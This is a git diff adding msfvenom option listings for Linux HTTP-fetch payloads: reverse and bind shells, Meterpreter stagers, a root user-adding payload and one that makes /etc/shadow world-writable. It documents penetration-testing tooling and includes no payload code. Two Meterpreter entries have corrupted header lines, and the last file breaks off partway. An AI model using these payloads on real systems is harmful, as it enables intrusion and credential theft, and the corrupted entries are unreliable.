b/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..aa3a1ae --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_ipv6_tcp.txt @@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME SCwomktA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..ae08899 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x64-shell_reverse_tcp.txt @@ -0,0 +1,81 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/http/x64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QpMFAeUjmWP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-adduser.txt b/msfvenom/payload_options/cmd-linux-http-x86-adduser.txt new file mode 100644 index 0000000..f49573f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-adduser.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Add User + Module: payload/cmd/linux/http/x86/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + vlad902 + spoonm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME cCeYYCJWit no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-chmod.txt b/msfvenom/payload_options/cmd-linux-http-x86-chmod.txt new file mode 100644 index 0000000..8436f49 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-chmod.txt @@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Linux Chmod + Module: payload/cmd/linux/http/x86/chmod + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FILE /etc/shadow yes Filename to chmod +MODE 0666 yes File mode (octal) + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DNiVRqeMDll no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Runs chmod on specified file with specified mode + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-exec.txt b/msfvenom/payload_options/cmd-linux-http-x86-exec.txt new file mode 100644 index 0000000..17db773 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-exec.txt @@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/x86/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + vlad902 + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME YvtCWJjZP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-generic-debug_trap.txt b/msfvenom/payload_options/cmd-linux-http-x86-generic-debug_trap.txt new file mode 100644 index 0000000..b4f7fec --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-generic-debug_trap.txt @@ -0,0 +1,65 @@ + + Name: HTTP Fetch, Generic x86 Debug Trap + Module: payload/cmd/linux/http/x86/generic/debug_trap + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + robert + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pjMOlGFBl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Generate a debug trap in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-generic-tight_loop.txt b/msfvenom/payload_options/cmd-linux-http-x86-generic-tight_loop.txt new file mode 100644 index 0000000..46bbf45 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-generic-tight_loop.txt @@ -0,0 +1,65 @@ + + Name: HTTP Fetch, Generic x86 Tight Loop + Module: payload/cmd/linux/http/x86/generic/tight_loop + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + jduck + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME zQKXcTkfE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Generate a tight loop in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp.txt new file mode 100644 index 0000000..c8aacb9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp.txt @@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind IPv6 TCP Stager (Linux x86) + Module: payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp: +========================= + +iam_webb@rapid7.com> + kris katterjohn + egypt + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iYLYuejSi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for an IPv6 connection (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..4cc0bf4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86) + Module: payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No +Evasion options for payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid: +========================= + +bb + kris katterjohn + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME AobslNTQQbO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for an IPv6 connection with UUID Support (Linux x86) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 